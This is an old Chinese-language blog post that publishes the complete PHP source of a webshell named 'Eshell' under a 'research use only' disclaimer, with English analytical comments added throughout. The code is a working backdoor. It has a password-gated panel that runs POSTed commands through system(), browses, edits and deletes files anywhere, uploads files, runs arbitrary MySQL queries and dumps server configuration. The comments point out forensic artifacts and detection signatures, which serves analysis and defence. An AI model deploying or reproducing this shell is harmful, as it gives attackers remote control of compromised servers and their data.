Friday, June 7, 2013

php 肉雞後台

肉雞後台

非常的古老，sqlmap互打的時代：明小子、中國菜刀、Havij，時代眼淚 qq
*研究用途,請勿使用於非法範圍*


<?php
// Every request joins (or creates) a PHP session; $_SESSION['jack'] is the only authentication state this file keeps.
session_start();
// Control class of the backdoor. One session flag gates a dispatcher that exposes:
// an environment dump, an unconfined directory browser with delete/edit/rename,
// file upload into this script's directory, system() execution of a POSTed
// string, a URL encoder and a raw MySQL console. Every method writes straight
// to the response; the only output escaping in the class is the
// htmlspecialchars() in the file editor. On-disk artifacts it can leave behind:
// log.txt (failed logins), uploaded files next to this script, and tempnam()
// probe files prefixed "evildao.txt".
class evildao{
// Request entry point, called from the page footer on every request.
// Session key 'jack' equal to 'ok!' -> page dispatcher; anything else -> login handling.
function yz_one(){
if(isset($_SESSION['jack']) and $_SESSION['jack']=='ok!'){
$this->program_start();// enter the command dispatcher
}else{
$this->yz_two();
}
}
// Login handler.
// - POST 'login' is hashed with unsalted MD5 and compared (loose ==) with a
//   hard-coded digest; a match sets the session flag and nothing else.
// - A wrong value appends a record (timestamp, REMOTE_ADDR, User-Agent) to
//   log.txt relative to the process working directory (usually this script's
//   directory). The User-Agent is written verbatim, so the log content is
//   client-influenced. The file itself is a durable indicator of this backdoor.
// - No POST at all: a bare one-field form is printed.
private function yz_two(){
if(isset($_POST['login'])){
$cmd=$_POST['login'];
// The constant is not a numeric-looking string, so loose == is a plain string compare here.
if(md5($cmd)=='4ff9fc6e4e5d5f590c4f2134a8cc96d1'){
$_SESSION['jack']='ok!';
// requesturl() is not defined anywhere in this file (the page only defines
// msg()), so the inline script presumably errors client-side; the session
// flag has already been set either way.
echo '登陸成功!</br/><script>requesturl();</script>';
}else
{
// Mode "a " carries a trailing space -- presumably treated as plain append; verify.
$fp = fopen("log.txt","a ");
// The whole label is passed to date() as the format string; its non-ASCII
// bytes, the spaces and ':' are not format characters and pass through unchanged.
$string = "日期 : "."Y-m-d H:i:s";
$string2 = "位置 : ".$_SERVER['REMOTE_ADDR'];
// HTTP_USER_AGENT is optional on the wire: absent -> undefined-index notice, empty field.
$string3 ="系統版本 : ".$_SERVER['HTTP_USER_AGENT'];
fwrite($fp,"-------------------------------------");
fwrite($fp,"\r\n");
fwrite ($fp,date($string));
fwrite($fp,"\r\n");
fwrite($fp,$string2 );
fwrite($fp,"\r\n");
fwrite($fp,$string3);
fwrite($fp,"\r\n");
fwrite($fp,"-------------------------------------");
fwrite($fp,"\r\n");
fclose($fp);
}
}else{
echo '<form action="" method="post"><input name="login" type="text" /></form>';
}
}
// Page dispatcher, reached only with the session flag set. switch() compares
// $_GET['page'] loosely; an unknown page prints just the banner. Each case
// prints its own form first and then acts on the GET/POST data sent with it.
private function program_start(){
echo '程式啟動完畢...<br/>';
if(isset($_GET['page'])){
switch ($_GET['page']){
// show=a: phpinfo(); show=b: the hand-rolled environment summary below.
case 'systeminfo':
echo '伺服器信息查看模組加載完畢...<br/>';
echo '<a href="?page=systeminfo&show=a">phpinfo</a>&nbsp;|&nbsp;';
echo '<a href="?page=systeminfo&show=b">自定義</a><hr/>';
if(isset($_GET['show']) and $_GET['show']=='a'){
phpinfo();
}
if(isset($_GET['show']) and $_GET['show']=='b'){
echo "檔案路徑:".__FILE__.'<br />';
// winf() probes writability of this script's directory by creating a temp file there.
echo $this->winf(str_replace('//','/',dirname(__FILE__))).'<br/>';
echo "伺服器系統 :".PHP_OS.'<br />';
echo "伺服器域名 :".$_SERVER['SERVER_NAME'].'<br />';
echo "WEB伺服器端口:".$_SERVER['SERVER_PORT'].'<br />';
// Format uses 'h' (12-hour clock); the CJK characters are not format letters and pass through.
echo "伺服器时间 :".date("Y年m月d日 h:i:s",time()).'<br />';
echo "伺服器IP地址 :".gethostbyname($_SERVER['SERVER_NAME']).'<br />';
// HTTP_ACCEPT_LANGUAGE is the *client's* request header, not a server encoding setting.
echo "伺服器操作系統文字編碼:".$_SERVER['HTTP_ACCEPT_LANGUAGE'].'<br />';
echo "伺服器解释引擎:".$_SERVER['SERVER_SOFTWARE'].'<br />';
echo "PHP運行方式 :".strtoupper(php_sapi_name()).'<br />';
echo "PHP版本 :".PHP_VERSION.'<br />';
echo "ZEND版本 :".zend_version().'<br />';
// diskfreespace() is the alias of disk_free_space().
echo "伺服器剩餘空间:".intval(diskfreespace(".") / (1024 * 1024)).'MB'.'<br />';
echo "脚本運行可占最大記憶體:".get_cfg_var("memory_limit").'<br />';
echo "脚本上傳檔案大小限制:".get_cfg_var("upload_max_filesize").'<br />';
echo "POST方法提交限制:".get_cfg_var("post_max_size").'<br />';
echo "脚本超时时间 :".get_cfg_var("max_execution_time").'秒<br />';
echo "被鎖定的函數 :".get_cfg_var("disable_functions").'<br />';
// ginf() renders 'NO' for a true/1 value and 'OFF' for anything else (see ginf()).
echo "动态链接库 :".$this->ginf(get_cfg_var("enable_dl")).'<br />';
echo "自定義全局變數:".$this->ginf(get_cfg_var("register_globals")).'<br />';
echo "顯示错误信息 :".$this->ginf(get_cfg_var("display_errors")).'<br />';
echo "PHP安全模式 :".$this->ginf(get_cfg_var("safe_mode")).'<br />';
// get_magic_quotes_gpc() takes no parameters; this line reports magic quotes,
// not FTP support. Together with safe_mode/register_globals and the
// mysql_*/ora_*/mssql_* probes below this dates the script to the PHP 5.x era.
echo "FTP檔案传输 :".$this->ginf(get_magic_quotes_gpc("FTP support")).'<br />';
echo"允許使用URL打開檔案:".$this->ginf(get_cfg_var("allow_url_fopen")).'<br />';
echo "SESSION支持 :".$this->ginf(function_exists("session_start")).'<br />';
echo "Socket支持 :".$this->ginf(function_exists("fsockopen")).'<br />';
echo "SNMP 協議 :".$this->ginf(function_exists("snmpget")).'<br />';
echo "MYSQL 數據庫 :".$this->ginf(function_exists("mysql_close")).'<br />';
echo "ODBC 數據庫 :".$this->ginf(function_exists("odbc_close")).'<br />';
echo "Oracle數據庫 :".$this->ginf(function_exists("ora_close")).'<br />';
echo "SQL SERVER數據庫:".$this->ginf(function_exists("mssql_close")).'<br />';
}
break;
// Directory browser. 'dir' comes verbatim from the query string (undefined-index
// notice when absent), falls back to this script's directory and is not confined
// to any root. delfile/editfile/renamefile are forwarded to c_file(); the
// downfile hook is commented out, and the top-level downfile block at the end
// of the PHP section only emits headers. $dir and every entry name are echoed
// into HTML text and href= attributes without escaping (the edit link's &dir=
// is not even urlencoded).
case 'lookdir':
$dir=$_GET['dir'];
$wwwrootdir=$_SERVER['DOCUMENT_ROOT'];
echo '網站的主目錄:<a href="?page=lookdir&dir='.urlencode($wwwrootdir).'">'.$wwwrootdir.'</a><br/><br/>';
//if(isset($_GET['downfile'])){$this->c_file($_GET['downfile'],'down');}
if(isset($_GET["delfile"])){$this->c_file($_GET["delfile"],'del');}
if(isset($_GET["editfile"])){$this->c_file($_GET["editfile"],'edit');}
if(isset($_GET["renamefile"])){$this->c_file($_GET["renamefile"],'ren');}
echo '<form action="" method="get">';
echo "請輸入要搜尋的目錄:";
echo '<input type="hidden" name="page" value="lookdir" />';
echo '<input type="text" name="dir">';
echo '<input type="submit" value="打開" />';
echo '</form>';
if (!isset($dir) or empty($dir)){$dir=str_replace('\\','/',dirname(__FILE__));}
echo '<br/>當前目錄:'.$dir.'<br/>................................................................................................<br/>';
// First pass: subdirectories. The readdir() result is the loop condition, so an
// entry literally named "0" (falsy) ends the listing early. is_dir() returns a
// bool; true=="1" here and false=="0" in the second pass hold under loose comparison.
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b=$dir.'/'.$file;
$a=@is_dir($b);
if($a=="1"){
if($file!=".." && $file!=".") {
echo '<a href="?page=lookdir&dir='.urlencode($dir).'/'.urlencode($file).'">'.$file.'</a><br/><br/>';
} else {
if($file==".."){echo '<a href="?page=lookdir&dir='.urlencode($dir).'/..">..</a><br/><br/>';}
}
}
}
echo '<br/>現在目錄下的檔案:<br/>................................................................................................<br/>';
// Second pass over the same directory: regular files with download/edit/rename/delete links.
@closedir($dirs);
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
if($a=="0"){
// $size is unrounded KB; filectime() is inode change time although the label says last modification.
$size=@filesize("$dir/$file")/1024;
$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));
echo $file.'<br/><br/>最後修改的檔案:'.$lastsave.'&nbsp;|&nbsp;檔案大小:'.$size.'&nbsp;KB&nbsp;<br/><br/>';
echo '<a href="?page=lookdir&downfile='.urlencode($dir).'/'.urlencode($file).'">下载</a>&nbsp;|&nbsp;';
echo '<a href="?page=lookdir&editfile='.urlencode($dir).'/'.urlencode($file).'&dir='.$dir.'">編輯</a>&nbsp;|&nbsp;';
echo '<a href="?page=lookdir&renamefile='.urlencode($dir).'/'.urlencode($file).'">重命名</a>&nbsp;|&nbsp;';
echo '<a href="?page=lookdir&delfile='.urlencode($dir).'/'.urlencode ($file).'">删除</a><br/><br/>';
}
}
@closedir($dirs);
break;
// Upload handler. The file is stored under its client-supplied name next to this
// script, joined with a backslash (Windows style; on POSIX the backslash becomes
// part of the file name, which is itself a recognisable artifact). PHP normally
// strips directory parts from $_FILES[...]['name'], so presumably only a bare
// name arrives -- verify. $accept_overwrite is fixed to 1, so the file_exists()
// branch can never fire. Every error path exit()s, cutting off the HTML footer
// that follows the class. $_FILES is read without isset(): a plain GET raises
// undefined-index notices.
case 'upfile':
echo '<form enctype="multipart/form-data" action="" method="post">';
echo '<input name="upload_file" type="file" /><input type="submit" value="上傳" />';
echo '</form>';
$upload_file=$_FILES['upload_file']['tmp_name'];
$upload_file_name=$_FILES['upload_file']['name'];
$upload_file_size=$_FILES['upload_file']['size'];
if($upload_file){
$file_size_max = 100000*100000;
$store_dir = dirname(__FILE__);
$accept_overwrite = 1;
if ($upload_file_size > $file_size_max) {
echo "檔案大小超過標準!<br/>";
exit;
}
if (file_exists($store_dir ."\\". $upload_file_name) && !$accept_overwrite) {
echo "檔案已存在!<br/>";
exit;
}
if (!move_uploaded_file($upload_file,$store_dir."\\".$upload_file_name)) {
echo "上傳檔案失敗!<br/>";
exit;
}
echo "上傳檔案名:".$_FILES['upload_file']['name']."<br/>";
echo "上傳檔案大小:".$_FILES['upload_file']['size']." Bytes<br/>";
}
break;
// Remote command execution: the POSTed 'cmd' string goes to system() and its
// output is streamed into the read-only textarea. @ hides the undefined-index
// notice on a plain GET and any system() warning. system() fed directly from
// $_POST is the defining signature of this file for detection purposes.
case 'cmd':
echo '<form action="" method="post">';
echo '<input type="text" name="cmd"/>';
echo '<input type="submit" value="執行"/><br/>';
echo '<textarea name="textarea" cols="70" rows="15" readonly>';
@system($_POST['cmd']);
echo '</textarea></form>';
break;
// URL encoder. urlencode() output contains no quotes or angle brackets, so it
// is safe inside the value="" attribute; a plain GET raises an undefined-index notice.
case 'changurl':
echo '<form action="" method="post">';
echo '<input type="text" value="';
echo urlencode($_POST['urltext']);
echo '" name="urltext" /></form>';
break;
// Raw MySQL console on the ext/mysql API, which was removed in PHP 7.0 -- this
// case cannot work on a current PHP. Credentials and the query text are taken
// from the POST and used verbatim.
case 'exmysql':
echo '<form action="" method="post">';
echo '數據庫位置 :<input name="servername" type="text" /><br/>';
echo '帳號 :<input name="username" type="text" /><br/>';
echo '密碼 :<input name="password" type="text" /><br/>';
echo '數據庫名稱 :<input name="dbname" type="text" /><br/>';
echo 'sql執行命令 :<textarea name="query" cols="60" rows="10"></textarea>';
echo '<input type="submit" value="執行" /></form>';
if(isset($_POST['servername']) and isset($_POST['username']) and isset($_POST['password']) and isset($_POST['dbname']) and isset($_POST['query'])){
$servername = $_POST['servername'];
$username = $_POST['username'];
$password = $_POST['password'];
$dbname = $_POST['dbname'];
$dbresult = $_POST['query'];
// '=' binds tighter than 'and': $link receives only the mysql_connect() result;
// the mysql_select_db() outcome affects just this if.
if ($link=@mysql_connect($servername,$username,$password) and @mysql_select_db($dbname)) {
echo "數據庫连接成功!<br/>";
} else {
echo "數據庫连接失敗!".mysql_error()."<br/>";
}
// The query runs even when the connect/select above failed (no early return).
if (!empty($dbresult)){
$dbresult = @mysql_query($dbresult);
echo ($dbresult) ? "命令執行完畢!" : "執行出错:".mysql_error();
// No link argument: closes the most recently opened connection.
mysql_close();
}
}
break;
// "Logout" overwrites the flag instead of unsetting it or destroying the session;
// the PHP session and its cookie survive. requesturl() is again undefined here.
case 'login_out':
$_SESSION['jack']='退出!';
echo '退出<br/><script>requesturl();</script>';
break;
}
}
}
//------------------------ helper area -------------------------------------------------------
// Writability probe: tempnam() itself creates a file in $dir, which is then
// opened, closed and unlinked. When $dir is not writable PHP's tempnam() falls
// back to the system temp directory (with a notice), so the "writable" message
// can presumably be a false positive -- verify. Leftover files named
// evildao.txt* in a directory mean the unlink failed.
private function winf($dir){
$t=tempnam("$dir","evildao.txt");
if ($f=@fopen($t,"w")){
@fclose($f);
@unlink($t);
$t="當前目錄可以寫入!";
}else {
$t="當前目錄不可以寫入!";
}
return $t;
}
// Renders a boolean-ish value: 'NO' when $t==1 (loose: true, 1, "1"), 'OFF'
// otherwise. Note the labels: 'NO' is what gets printed for an enabled feature.
private function ginf($t){
if($t==1){$t='NO';}else{$t='OFF';}
return $t;
}
// File operations for the directory browser. $f is the path from the query
// string, $t selects the action. 'edit' and 'ren' use basename() only, i.e.
// they act relative to the process working directory, not the directory browsed.
private function c_file($f,$t){
switch ($t){
// Download is an empty stub; its only call site in program_start() is commented out.
case 'down':
//...
break;
// Delete: unlink() on the path exactly as given (no confinement).
case 'del':
if(is_file($f)){
$message = (@unlink($f))? "删除成功!" : "貌似錯誤" ;
}else{
$message = "起確定是這個檔案?";
}
echo $message;
break;
// Edit: reads and writes basename($f) in the working directory. Without a
// posted 'newe' the content is shown in a textarea (the one htmlspecialchars()
// in this file); the form posts back to the same URL, so the editfile= query
// parameter is retained. With 'newe' the body is written back after
// stripslashes() (magic_quotes-era). fopen 'w+' creates the file if absent.
// For a missing or zero-length file filesize() yields false/0 and fread() with
// that length presumably fails (a ValueError on PHP 8, which @ does not
// suppress) -- verify.
case 'edit':
$e=basename($f);
if(empty($_POST['newe'])){
echo '<form action="" method="post">';
$fp=@fopen("$e","r");
$data=@fread($fp,filesize($e));
echo '<textarea name="newe" cols="80" rows="20" >';
echo htmlspecialchars($data);
@fclose($fp);
echo '</textarea><input type="submit" value="編輯"/></form>';
}
if (!empty($_POST['newe'])){
$fp=@fopen("$e","w+");
echo ($result=@fwrite($fp,stripslashes($_POST['newe'])))?"檔案編輯成功!":"檔案編輯似乎失敗了……";
@fclose($fp);
}
break;
// Rename: $renamefile is never assigned in this method (the caller passes the
// path as $f), so basename() receives null and rename() gets an empty source
// name. As written, a posted 'newname' presumably always ends in the failure
// message; $_POST['newname'] is also read without isset() on the initial GET.
case 'ren':
echo '<form action="" method="post">';
echo '檔案新名字:<input type="text" name="newname"/><input type="submit" value="确定"/>';
$oldname=basename($renamefile);
if (@rename($oldname,$_POST['newname'])){
echo '檔案名修改成功!';
}else{
if (!empty($_POST['newname'])){echo '檔案名修改失敗!';}
}
break;
}
}
}//class end
// Runs on every request, before the session check and before any HTML: with
// ?downfile= present it emits attachment headers for basename() of the value,
// but no file is opened or streamed here (c_file()'s 'down' case is an empty
// stub and its call site is commented out), so the client receives the rest of
// this page as the "download". header() rejects values containing newlines, so
// $filename cannot inject further headers. "application/force-download" is a
// non-standard legacy content type.
if(isset($_GET['downfile'])){
$filename = basename($_GET['downfile']);
header("Content-Type: application/force-download; name=".$filename);
header("Content-Transfer-Encoding: binary");
header("Content-Disposition: attachment; filename=".$filename);
header("Expires: 0");
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Eshell - by:Jack</title>
<script type="text/JavaScript">
<!--
// Wraps the browser confirm() dialog and returns its boolean answer.
// Defined on the page but not referenced by any of the visible markup.
function msg() {
    return confirm('操作二级提示!');
}
//-->
</script><font color="REd">下午 05:59 2013/1/21</font>
</head>
<body background="/index.jpg">
<?php
// The navigation bar is rendered only for an authenticated session; the page=
// values map one-to-one onto the switch cases in evildao::program_start().
if(isset($_SESSION['jack']) and $_SESSION['jack']=='ok!'){
?>
|&nbsp;<a href="?page=systeminfo"><font color="REd">伺服器訊息查看</a>&nbsp;|&nbsp;
<a href="?page=lookdir"><font color="REd">目錄檔案查看</a></font>&nbsp;|&nbsp;
<a href="?page=upfile"><font color="REd">上傳檔案</a></font>&nbsp;|&nbsp;
<a href="?page=cmd"><font color="REd">WEBshell</a></font>&nbsp;|&nbsp;
<a href="?page=changurl"><font color="REd">URL編碼器</a></font>&nbsp;|&nbsp;
<a href="?page=exmysql"><font color="REd">MySQL</a></font>&nbsp;|&nbsp;
<a href="?page=login_out"><font color="REd">退出</a></font>&nbsp;|&nbsp;
<hr/>
<?php
}
// Single entry point for every request, authenticated or not; evildao::yz_one()
// decides between the login handler and the dispatcher.
$class = new evildao();
$class->yz_one();
?>
<hr/><br/>
&copy;BY:x213212(Jack)
<br/><br/>
</body>
</html>